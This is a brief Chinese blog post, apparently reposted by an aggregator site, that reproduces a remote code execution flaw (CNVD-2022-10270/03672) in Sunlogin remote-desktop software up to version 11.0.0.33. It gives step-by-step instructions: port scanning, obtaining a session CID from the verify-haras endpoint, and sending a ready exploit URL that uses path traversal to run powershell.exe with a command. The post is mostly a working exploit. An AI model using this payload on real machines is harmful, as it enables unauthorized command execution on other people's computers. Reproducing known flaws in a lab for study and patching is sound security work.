CNVD-2022-10270/CNVD-2022-03672 向日葵RCE復(fù)現(xiàn)

1. 我們先安裝漏洞版本的向日葵也就是<=11.0.0.33版本的，

2. 打開向日葵，連接服務(wù)器成功才可以

3. 打開之后會(huì)自動(dòng)開啟一個(gè)端口（40000-60000）之間隨機(jī)的，我們掃描一下端口（查看安裝向日葵電腦的ip）

4. 瀏覽器訪問ip+端口號(hào)+cgi-bin/rpc?action=verify-haras(獲取session值CID)一個(gè)一個(gè)端口嘗試

5. 拿到CID-添加payload和cookie-發(fā)送

http://192.168.234.139:49676/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+%20whoami

總結(jié)

以上是生活随笔為你收集整理的向日葵RCE的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。